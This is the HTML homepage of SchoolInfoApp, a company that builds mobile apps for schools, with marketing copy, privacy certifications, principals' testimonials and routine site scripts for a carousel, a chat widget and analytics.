data-toggle="collapse" data-target=".x-nav-wrap.mobile"> <i class="x-icon-bars" data-x-icon="&#xf0c9;"></i> <span class="visually-hidden">Navigation</span> </a> <nav class="x-nav-wrap desktop" role="navigation"> <ul id="menu-mainmenu" class="x-nav"><li id="menu-item-1927" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1927"><a href="https://schoolinfoapp.com/demo/"><span>Schedule A Demo</span></a></li> <li id="menu-item-68" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-68"><a href="#"><span>Learn More</span></a> <ul class="sub-menu"> <li id="menu-item-71" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-71"><a href="https://schoolinfoapp.com/why-an-app/"><span>Why An App?</span></a></li> <li id="menu-item-72" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-72"><a href="https://schoolinfoapp.com/why-schoolinfoapp/"><span>Why SchoolInfoApp?</span></a></li> <li id="menu-item-73" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-73"><a href="https://schoolinfoapp.com/schoolinfoapp-features/"><span>Features</span></a></li> <li id="menu-item-745" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-745"><a href="https://schoolinfoapp.com/appcessibility-by-schoolinfoapp/"><span>Appcessibility</span></a></li> <li id="menu-item-74" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-74"><a href="https://schoolinfoapp.com/our-apps/"><span>Our Apps</span></a></li> <li id="menu-item-76" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-76"><a href="https://schoolinfoapp.com/sponsors/"><span>Sponsor Program</span></a></li> <li id="menu-item-75" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-75"><a href="https://schoolinfoapp.com/schoolinfoapp-in-the-press/"><span>In The Press</span></a></li> <li id="menu-item-67" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="https://schoolinfoapp.com/schoolinfoapp-frequently-asked-questions/"><span>FAQ</span></a></li> <li id="menu-item-66" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="https://schoolinfoapp.com/partners/"><span>Partners</span></a></li> <li id="menu-item-921" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-921"><a href="https://schoolinfoapp.com/careers/"><span>Careers</span></a></li> </ul> </li> <li id="menu-item-289" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-289"><a href="https://schoolinfoapp.com/schoolinfoapp-pricing/"><span>Pricing</span></a></li> <li id="menu-item-63" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-63"><a href="https://schoolinfoapp.com/get-started/"><span>Get Started</span></a></li> <li id="menu-item-70" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-70"><a href="#"><span>Support</span></a> <ul class="sub-menu"> <li id="menu-item-62" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-62"><a href="https://schoolinfoapp.com/contact-schoolinfoapp/"><span>Contact Us</span></a></li> <li id="menu-item-380" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-380"><a href="https://admin.schoolinfoapp.com/Account/Login?ReturnUrl=%2F"><span>Admin Login</span></a></li> <li id="menu-item-60" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-60"><a href="https://schoolinfoapp.com/admin-training/"><span>Admin Training</span></a></li> <li id="menu-item-58" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58"><a href="https://schoolinfoapp.com/partner-with-schoolinfoapp/"><span>Partner With Us</span></a></li> <li id="menu-item-57" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57"><a href="https://schoolinfoapp.com/schoolinfoapp-custom-development/"><span>Custom Development</span></a></li> <li id="menu-item-220" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-220"><a href="http://www.appsbysia.com/"><span>Apps by SIA</span></a></li> <li id="menu-item-55" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="https://schoolinfoapp.com/privacy-policy/"><span>Privacy Policy</span></a></li> <li id="menu-item-54" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54"><a href="https://schoolinfoapp.com/terms-of-service/"><span>Terms of Service</span></a></li> </ul> </li> <li class="menu-item x-menu-item x-menu-item-search"><a href="#" class="x-btn-navbar-search"><span><i class="x-icon-search" data-x-icon="&#xf002;" aria-hidden="true"></i><span class="x-hidden-desktop"> Search</span></span></a></li></ul></nav> <div class="x-nav-wrap mobile collapse"> <ul id="menu-mainmenu-1" class="x-nav"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1927"><a href="https://schoolinfoapp.com/demo/"><span>Schedule A Demo</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-68"><a href="#"><span>Learn More</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-71"><a href="https://schoolinfoapp.com/why-an-app/"><span>Why An App?</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-72"><a href="https://schoolinfoapp.com/why-schoolinfoapp/"><span>Why SchoolInfoApp?</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-73"><a href="https://schoolinfoapp.com/schoolinfoapp-features/"><span>Features</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-745"><a href="https://schoolinfoapp.com/appcessibility-by-schoolinfoapp/"><span>Appcessibility</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-74"><a href="https://schoolinfoapp.com/our-apps/"><span>Our Apps</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-76"><a href="https://schoolinfoapp.com/sponsors/"><span>Sponsor Program</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-75"><a href="https://schoolinfoapp.com/schoolinfoapp-in-the-press/"><span>In The Press</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-67"><a href="https://schoolinfoapp.com/schoolinfoapp-frequently-asked-questions/"><span>FAQ</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-66"><a href="https://schoolinfoapp.com/partners/"><span>Partners</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-921"><a href="https://schoolinfoapp.com/careers/"><span>Careers</span></a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-289"><a href="https://schoolinfoapp.com/schoolinfoapp-pricing/"><span>Pricing</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-63"><a href="https://schoolinfoapp.com/get-started/"><span>Get Started</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-70"><a href="#"><span>Support</span></a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-62"><a href="https://schoolinfoapp.com/contact-schoolinfoapp/"><span>Contact Us</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-380"><a href="https://admin.schoolinfoapp.com/Account/Login?ReturnUrl=%2F"><span>Admin Login</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-60"><a href="https://schoolinfoapp.com/admin-training/"><span>Admin Training</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-58"><a href="https://schoolinfoapp.com/partner-with-schoolinfoapp/"><span>Partner With Us</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-57"><a href="https://schoolinfoapp.com/schoolinfoapp-custom-development/"><span>Custom Development</span></a></li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-220"><a href="http://www.appsbysia.com/"><span>Apps by SIA</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55"><a href="https://schoolinfoapp.com/privacy-policy/"><span>Privacy Policy</span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-54"><a href="https://schoolinfoapp.com/terms-of-service/"><span>Terms of Service</span></a></li> </ul> </li> <li class="menu-item x-menu-item x-menu-item-search"><a href="#" class="x-btn-navbar-search"><span><i class="x-icon-search" data-x-icon="&#xf002;" aria-hidden="true"></i><span class="x-hidden-desktop"> Search</span></span></a></li></ul></div> </div> </div> </div> </div> </header> <div class="x-main full" role="main"> <article id="post-8" class="post-8 page type-page status-publish hentry no-post-thumbnail"> <div class="entry-content content"> <div id="cs-content" class="cs-content"><div id="x-section-1" class="x-section cs-hide-xs cs-hide-sm bg-image parallax" style="margin: 0px;padding: 0px;min-height: 600px; background-image: url(https://schoolinfoapp.com/wp-content/uploads/2016/12/homepage.jpg); background-color: transparent;" data-x-element="section" data-x-params="{&quot;type&quot;:&quot;image&quot;,&quot;parallax&quot;:true}"><div class="x-container marginless-columns" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-2" style="padding: 0px 0px 0px 30px;" ><h1 class="h-custom-headline h2" style="color: hsl(0, 0%, 100%);text-shadow: 1px 2px #000000;"><span>We Build Great Apps For Great Schools.</span></h1></div><div class="x-column x-sm x-1-2" style="padding: 0px;" >&nbsp;</div></div><div class="x-container max width" style="margin: 300px auto 0px;padding: 0px;" ><div class="x-column x-sm x-1-3" style="padding: 0px;" ><div class="x-text cs-ta-center" style="text-shadow: 1px 2px #000000;color:#fff;margin-top:40%;" ><p><i>Certified by</i> iKEEPSAFE</p> </div></div><div class="x-column x-sm x-1-3" style="padding: 0px;" >&nbsp;</div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn overlaybtn x-btn-global x-btn-block" href="https://schoolinfoapp.com/page/#homepagejump" title="Learn More" data-options="thumbnail: ''">Learn More</a><a class="x-btn overlaybtn x-btn-global x-btn-block" style="margin-top: 25px;margin-bottom: 10px;" href="https://schoolinfoapp.com/schedule-a-demo/" title="Learn More" data-options="thumbnail: ''">Talk To Us</a><a class="x-img alignright x-img-link x-img-none" style="max-width: 40px;" href="https://schoolinfoapp.com/page/#homepagejump" title="Scroll Down" data-options="thumbnail: 'https://schoolinfoapp.com/wp-content/uploads/2017/04/pagedown.png'"><img src="https://schoolinfoapp.com/wp-content/uploads/2017/04/pagedown.png" ></a></div></div></div><div id="x-section-2" class="x-section cs-hide-md cs-hide-lg cs-hide-xl bg-image parallax" style="margin: -30px 0px 0px;padding: 0px;min-height: 600px; background-image: url(https://schoolinfoapp.com/wp-content/uploads/2016/12/homepage.jpg); background-color: transparent;" data-x-element="section" data-x-params="{&quot;type&quot;:&quot;image&quot;,&quot;parallax&quot;:true}"><div class="x-container marginless-columns" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-2" style="padding: 0px 0px 0px 30px;" ><h1 class="h-custom-headline cs-ta-center h3" style="color: hsl(0, 0%, 100%);text-shadow: 1px 2px #000000;"><span>We Build Great Apps For Great Schools.</span></h1><a class="x-img alignright x-img-link x-img-none" style="max-width: 40px;" href="https://schoolinfoapp.com/page/#homepagejump" title="Scroll Down" data-options="thumbnail: 'https://schoolinfoapp.com/wp-content/uploads/2017/04/pagedown.png'"><img src="https://schoolinfoapp.com/wp-content/uploads/2017/04/pagedown.png" ></a><hr class="x-gap" style="margin: 500px 0 0 0;"></div><div class="x-column x-sm x-1-2" style="padding: 0px;" >&nbsp;</div></div><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><a class="x-btn overlaybtnmbl x-btn-global x-btn-block" href="https://schoolinfoapp.com/page/#homepagejump" title="Learn More" data-options="thumbnail: ''">Learn More</a><a class="x-btn overlaybtnmbl x-btn-global x-btn-block" style="margin-top: 25px;margin-bottom: 10px;" href="https://schoolinfoapp.com/schedule-a-demo/" title="Learn More" data-options="thumbnail: ''">Talk To Us</a><div class="x-text cs-ta-center" style="text-shadow: 1px 2px #000000;color:#fff;" ><p><i>Certified by</i> iKEEPSAFE</p> </div></div></div><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" >&nbsp;</div></div></div><div id="x-section-3" class="x-section" style="margin: 0px;padding: 0px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><hr class="x-hr" style="border-top-color: hsla(0, 0%, 0%, 0.16);border-top-width: 1px;"></div></div></div><div id="x-section-4" class="x-section" style="margin: 0px;padding: 0px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-2-3" style="padding: 0px;" ><div id="homepagejump" class="x-text" style="padding-top: 25px;" ><p>We build great apps for great schools and school districts and have published Apple, Android and web-based apps serving thousands of schools and districts throughout the US, Canada and Europe. The only thing we do is develop and manage mobile apps for schools and school districts, so our focus is 100% on doing that exceptionally well. Our apps get consistently high ratings from students, parents, teachers and administrators for having powerful features that are time-saving and easy to use. </p> <p>Apps by SchoolInfoApp have been recognized by District Administration magazine as a Top 100 Product and the New Product Showcase for the past 6 consecutive years and we&#8217;ve been featured in <a href="https://schoolinfoapp.com/schoolinfoapp-in-the-press/">numerous publications</a>.</p> <p>We invite you to <a href="https://schoolinfoapp.com/our-apps/">demo one of our apps</a>, check out the robust set of available <a href="https://schoolinfoapp.com/schoolinfoapp-features/">features</a> or <a href="https://schoolinfoapp.com/schedule-a-demo/">contact us</a> to learn more about developing an app for your school or district.</p> </div></div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" style="max-height: 350px;" src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Home_menu_screenshot.png" ></div></div><div class="x-container max width" style="margin: 0px auto;padding: 20px 0px 0px;" ><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn aligncenter x-btn-global" style="margin-bottom: 25px;" href="https://schoolinfoapp.com/why-an-app/" data-options="thumbnail: ''">Learn More</a></div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn aligncenter x-btn-global" style="margin-bottom: 25px;" href="https://schoolinfoapp.com/schedule-a-demo/" data-options="thumbnail: ''">Talk To Us</a></div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn aligncenter x-btn-global" style="margin-bottom: 25px;" href="https://schoolinfoapp.com/request-a-quote/" data-options="thumbnail: ''">Request A Quote</a></div></div></div><div id="x-section-5" class="x-section" style="margin: 0px;padding: 45px 0px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-5" style="padding: 0px;" >&nbsp;</div><div class="x-column x-sm x-1-5" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/10/coppa_cert_200.jpg" ></div><div class="x-column x-sm x-1-5" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/10/cspc_cert_200.jpg" ></div><div class="x-column x-sm x-1-5" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/10/ferpa_cert_200.jpg" ></div><div class="x-column x-sm x-1-5" style="padding: 0px;" >&nbsp;</div></div><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><div class="x-text cs-ta-center" ><p><a href="https://ikeepsafe.org/" rel="noopener" target="_blank">iKeepSafe</a> has certified our practices for the protection and privacy of student information.</p> </div></div></div></div><div id="x-section-6" class="x-section" style="margin: 0px;padding: 45px 0px 0px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><h2 class="h-custom-headline h3" ><span>It&#8217;s never been easier to Share!</span></h2><hr class="x-hr" style="border-top-width: 1px;"><img class="x-img x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/04/school_header.png" ><hr class="x-hr" style="border-top-width: 1px;"><div class="x-text" ><p>With Share! by SchoolInfoApp, you can make magic happen! With just a few clicks anytime and from anywhere, you can easily share content, images and video across all of your school or district&#8217;s communication channels including your app by SchoolInfoApp, social media, website no matter who your website/CMS provider is and by voice dial, text or email. Connecting with your school community has never been easier!</p> </div></div></div><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-3" style="padding: 0px;" >&nbsp;</div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn aligncenter x-btn-global" href="https://schoolinfoapp.com/share/" data-options="thumbnail: ''">Learn More</a></div><div class="x-column x-sm x-1-3" style="padding: 0px;" >&nbsp;</div></div></div><div id="x-section-7" class="x-section" style="margin: 0px;padding: 0px 0px 45px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><hr class="x-hr" style="border-top-width: 1px;"><h2 class="h-custom-headline h3" ><span>Don&#8217;t just take our word for it&#8230;</span></h2><div class="x-text" ><p> <style> .owl-pagination{ } .owl-buttons{ color: } .owl-buttons{ } </style> <style type="text/css"> #tss_warppper{ background: #e2e2e2; width: 200px; text-align: center; margin: 0 auto; padding: 10px; } #tss_image{ max-width: 150px; border-radius:100px; text-align: center; display: initial !important; } .tss_p{ font-size: 14px; font-weight: 100; color: #666666; } #tss_name{ font-weight: bold; font-size: 16px; text-align: center; } #tss_occupation{ font-style: italic; text-align: center; } #tss_testimonial span{ font-size: 29px; font-weight:bold; color: #dddddd; } #tss_testimonial{ font-size: 15px; text-align: left; } </style> <div id="tss_id86" class="owl-carousel" style='text-align:center;'> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Kevin_Keena.png"> <p class='tss_p' id='tss_name'>Kevin Keena</p> <p class='tss_p' id='tss_occupation'>Integrated Learning Specialist Heritage High School, Littleton, Colorado</p> <p class='tss_p' id='tss_testimonial'><span>"</span>SchoolInfoApp provides the Heritage community with a robust, practical, and engaging mobile app that's easy and fun to use. Our user feedback has been tremendous! The Quick Links provide a high level of customization and the events calendars sync to our existing system so there's virtually no extra work for anyone on our staff. It's fantastic! <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Coy_Sudvary.png"> <p class='tss_p' id='tss_name'>Coy Sudvary</p> <p class='tss_p' id='tss_occupation'>Principal Buckeye Local High School, Rayland, OH</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Everywhere I turn parents are thanking our staff for our new app and raving about all the different features! And students are continually telling me how cool it is. It has honestly exceeded our expectations! Not only is the customer service extremely helpful and easy to work with, but the app itself is amazing. I would definitely recommend SchoolInfoApp to any school district who wants to stay current with a fast, reliable app. <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2016/12/ChrisBrown.jpg"> <p class='tss_p' id='tss_name'>Chris Brown</p> <p class='tss_p' id='tss_occupation'>Assistant Principal Walton High School, DeFuniak Springs, FL</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Our app allows all of our stakeholders to have the most current information in real time. Whether it is the push notifications, athletic schedules, or pictures from a pep rally, parents and students are constantly telling us about how happy they are to have an app designed with them in mind. SchoolInfoApp is a must for every school. All in all, it just works! <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Rosa_Fazio.png"> <p class='tss_p' id='tss_name'> Rosa Fazio</p> <p class='tss_p' id='tss_occupation'>Principal Norma Rose Point School, Vancouver, BC</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Our app by SchoolInfo App is a communication game changer. I can push out a notification to subscribers in a matter of seconds and it can be received in any chosen language. Everything about our school can be found in ONE location - no more searching for an email or browsing the website for info, everything families need to know is contained within the app or linked to it. It is convenient, effective and beyond cool! <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Stennette_Byrd.png"> <p class='tss_p' id='tss_name'> Dr. Stenette Byrd III</p> <p class='tss_p' id='tss_occupation'>Principal Kings Fork High School, Suffolk, VA</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Our faculty, staff, students, parents and community continue to rave about our app by SchoolInfoApp even after we've been using it for several years now. Is not uncommon to hear comments such as, "I can't believe every school doesn't have this app." The school community has instant access to my posts, schedules of school and athletic events, student handbooks, photos, and anything else that I choose to share. <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/Kelly_Snell.png"> <p class='tss_p' id='tss_name'>Kelly Snell</p> <p class='tss_p' id='tss_occupation'>Assistant to the Principal/Activities Director Eaglecrest High School, Centennial, CO</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Our app by SchoolInfoApp has changed the way we are able to communicate with our community, and the support provided makes the upkeep seamless. We couldn't be happier with the service provided by the SchoolInfoApp team. <span>"</span></p> </div> </div> <div id='tss_warppper'> <div id='tss_content'> <img id='tss_image' src="https://schoolinfoapp.com/wp-content/uploads/2017/05/clark_mershon.png"> <p class='tss_p' id='tss_name'>Clark Mershon </p> <p class='tss_p' id='tss_occupation'>Principal, Staley High School</p> <p class='tss_p' id='tss_testimonial'><span>"</span>Our app by SchoolInfoApp has not only enhanced our marketing and branding efforts, but has promoted and synced all of our communication efforts which has increased stakeholder (staff, students, parents, community) value of Staley High School.<span>"</span></p> </div> </div> </div> <script> jQuery(document).ready(function() { jQuery("#tss_id86").owlCarousel({ items :1, singleItem: true, autoPlay : true, stopOnHover : true, navigation: true, paginationSpeed : 1000, goToFirstSpeed : 1000, singleItem : false, autoHeight : true, slideSpeed : 10000, transitionStyle: 'fade', pagination : false, paginationNumbers :false, navigationText : ["<b><</b>", "<b>></b>"], }); }); </script></p> </div></div></div></div><div id="x-section-8" class="x-section" style="margin: 0px;padding: 0px 0px 45px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-1" style="padding: 0px;" ><h3 class="h-custom-headline cs-ta-center h5" ><span>Are you a parent, student or teacher and would like your school or district to get an app by SchoolInfoApp? </p> </span></h3></div></div><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-3" style="padding: 0px;" >&nbsp;</div><div class="x-column x-sm x-1-3" style="padding: 0px;" ><a class="x-btn aligncenter x-btn-global" style="margin-bottom: 25px;" href="https://schoolinfoapp.com/interested-in-schoolinfoapp/" target="_blank" data-options="thumbnail: ''">Click Here To Let US Know</a></div><div class="x-column x-sm x-1-3" style="padding: 0px;" >&nbsp;</div></div></div><div id="x-section-9" class="x-section" style="margin: 0px;padding: 0px 0px 45px; background-color: transparent;" ><div class="x-container max width" style="margin: 0px auto;padding: 0px;" ><div class="x-column x-sm x-1-6" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/05/DATop100-2013-Badge.png" ></div><div class="x-column x-sm x-1-6" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/05/DATop100-2014-Badge.png" ></div><div class="x-column x-sm x-1-6" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/05/DATop100-2015-Badge.png" ></div><div class="x-column x-sm x-1-6" style="padding: 0px;" ><img class="x-img aligncenter x-img-none" src="https://schoolinfoapp.com/wp-content/uploads/2017/05/DATop100-2016-Badge.png" ></div><div class="x-column x-sm x-1-6" style="padding: 0px;" ><a class="x-img aligncenter x-img-link x-img-none" href="http://www.nxtbook.com/pmg/DA/DA_1217/index.php#/78" title="District Administrator New Product Showcase" target="_blank" data-options="thumbnail: 'https://schoolinfoapp.com/wp-content/uploads/2018/02/DATop100_2017_Badge2.png'"><img src="https://schoolinfoapp.com/wp-content/uploads/2018/02/DATop100_2017_Badge2.png" ></a></div><div class="x-column x-sm x-1-6" style="padding: 0px;" ><a class="x-img aligncenter x-img-link x-img-none" href="http://www.nxtbook.com/pmg/DA/DA_1218/index.php#/88" title="District Administrator New Product Showcase 2018" target="_blank" data-options="thumbnail: 'https://schoolinfoapp.com/wp-content/uploads/2018/12/DATop100_2018_Badge.png'"><img src="https://schoolinfoapp.com/wp-content/uploads/2018/12/DATop100_2018_Badge.png" ></a></div></div></div></div> </div> </article> </div> <a class="x-scroll-top right fade" href="#top" title="Back to Top"> <i class="x-icon-angle-up" data-x-icon="&#xf106;"></i> </a> <script> jQuery(document).ready(function($) { var windowObj = $(window); var body = $('body'); var bodyOffsetBottom = windowObj.scrollBottom(); // 1 var bodyHeightAdjustment = body.height() - bodyOffsetBottom; // 2 var bodyHeightAdjusted = body.height() - bodyHeightAdjustment; // 3 var scrollTopAnchor = $('.x-scroll-top'); function sizingUpdate(){ var bodyOffsetTop = windowObj.scrollTop(); if ( bodyOffsetTop > ( bodyHeightAdjusted * 0.75 ) ) { scrollTopAnchor.addClass('in'); } else { scrollTopAnchor.removeClass('in'); } } windowObj.bind('scroll', sizingUpdate).resize(sizingUpdate); sizingUpdate(); scrollTopAnchor.click(function(){ $('html,body').animate({ scrollTop: 0 }, 850, 'easeInOutExpo'); return false; }); }); </script> <footer class="x-colophon top" role="contentinfo"> <div class="x-container max width"> <div class="x-column x-md x-1-4"></div><div class="x-column x-md x-1-4"><div id="custom_html-2" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a href="https://ikeepsafe.org/"><img src="https://schoolinfoapp.com/wp-content/uploads/2017/10/iKEEPSAFE-300x100.jpg" alt="" width="300" height="100" class="aligncenter size-medium wp-image-1879" /></a></div></div></div><div class="x-column x-md x-1-4"><div id="custom_html-4" class="widget_text widget widget_custom_html"><div class="textwidget custom-html-widget"><a href="https://studentprivacypledge.org/signatories/"><img src="https://schoolinfoapp.com/wp-content/uploads/2016/12/Student-Privacy-Pledge-Signatory-1.png" alt="" width="167" height="82" class="aligncenter size-full wp-image-541" /></a></div></div></div><div class="x-column x-md x-1-4 last"><div id="text-6" class="widget widget_text"> <div class="textwidget"><p>©SchoolInfoApp, LLC<br /> P.O. Box 2144<br /> Ruston, LA 71273 USA<br /> Phone: (318) 202-3713<br /> Toll free: (844) 824-1466<br /> <a href="https://schoolinfoapp.com/contact-schoolinfoapp/">CONTACT US</a></p> </div> </div></div> </div> </footer> <footer class="x-colophon bottom" role="contentinfo"> <div class="x-container max width"> <div class="x-social-global"><a href="https://www.facebook.com/schoolinfoapp" class="facebook" title="Facebook" target="_blank"><i class="x-icon-facebook-square" data-x-icon="&#xf082;" aria-hidden="true"></i></a><a href="https://twitter.com/schoolinfoapp" class="twitter" title="Twitter" target="_blank"><i class="x-icon-twitter-square" data-x-icon="&#xf081;" aria-hidden="true"></i></a><a href="https://www.linkedin.com/company/schoolinfoapp" class="linkedin" title="LinkedIn" target="_blank"><i class="x-icon-linkedin-square" data-x-icon="&#xf08c;" aria-hidden="true"></i></a><a href="https://www.instagram.com/schoolinfoapp/" class="instagram" title="Instagram" target="_blank"><i class="x-icon-instagram" data-x-icon="&#xf16d;" aria-hidden="true"></i></a></div> </div> </footer> <div class="x-searchform-overlay"> <div class="x-searchform-overlay-inner"> <div class="x-container max width"> <form method="get" id="searchform" class="form-search center-text" action="https://schoolinfoapp.com/"> <label for="s" class="cfc-h-tx tt-upper">Type and Press &ldquo;enter&rdquo; to Search</label> <input type="text" id="s" class="search-query cfc-h-tx center-text tt-upper" name="s"> </form> </div> </div> </div> </div> <!-- END #top.site --> <script type="text/javascript"> var $zoho=$zoho || {};$zoho.salesiq = $zoho.salesiq || {widgetcode:"90d43df53828678f5e5b9ec8fa965da5c3970050d7ab9174f705bb6f0ddf38b9870c476d33149ffb53cd17e278100c61", values:{},ready:function(){}};var d=document;s=d.createElement("script");s.type="text/javascript";s.id="zsiqscript";s.defer=true;s.src="https://salesiq.zoho.com/widget";t=d.getElementsByTagName("script")[0];t.parentNode.insertBefore(s,t);d.write("<div id='zsiqwidget'></div>"); </script><script> $zoho.salesiq.internalready = function() { $zoho.salesiq.floatbutton.visible("hide");}</script><script> jQuery(document).ready(function () { jQuery.post('https://schoolinfoapp.com?ga_action=googleanalytics_get_script', {action: 'googleanalytics_get_script'}, function(response) { var F = new Function ( response ); return( F() ); }); }); </script><script type='text/javascript' src='https://schoolinfoapp.com/wp-content/themes/x/framework/js/dist/site/x-body.min.js?ver=4.6.1'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-includes/js/comment-reply.min.js?ver=5.0.4'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-content/plugins/cornerstone/assets/dist/js/site/cs-body.js?ver=2.0.6'></script> <script type='text/javascript' src='https://schoolinfoapp.com/wp-includes/js/wp-embed.min.js?ver=5.0.4'></script> </body> </html>
0
